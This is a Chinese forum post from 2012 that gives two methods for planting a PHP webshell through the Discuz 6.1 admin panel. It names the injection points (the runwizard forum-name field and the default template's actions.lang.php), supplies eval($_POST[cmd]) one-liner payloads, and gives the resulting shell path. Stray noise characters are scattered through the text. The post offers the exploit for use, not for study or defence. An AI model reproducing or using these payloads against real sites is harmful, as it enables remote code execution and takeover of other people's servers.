discuz6.1两种方法后台拿shell3 o( ^0 b5 R& P: v
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
! z+ C2 M/ w# x. e1:8 k# F( @! L3 j y/ \7 |( ^ F" @
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
+ b, O; d% z) q6 E0 n& Sadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
_( ?9 S4 d) Q6 U$ k1 M0 {7 u<?php eval($_POST[cmd]);?>& x- J& T6 H/ k- M Y" h$ \4 w& }
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
z$ A/ _) A. O" S8 Q
4 E0 h/ b9 i; e) z# H6 \; f3 `. y1 h9 C! L+ W
2:后台模板管理--默认模板套系--详情& _4 w# ~" U- ^# t
templates/default/actions.lang.php3 _! M2 B2 e, `( Q
jhackj\\');eval($_POST[cmd])?>;//: m- _: `- |% L8 G5 s
{ O0 A3 [6 y/ D利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对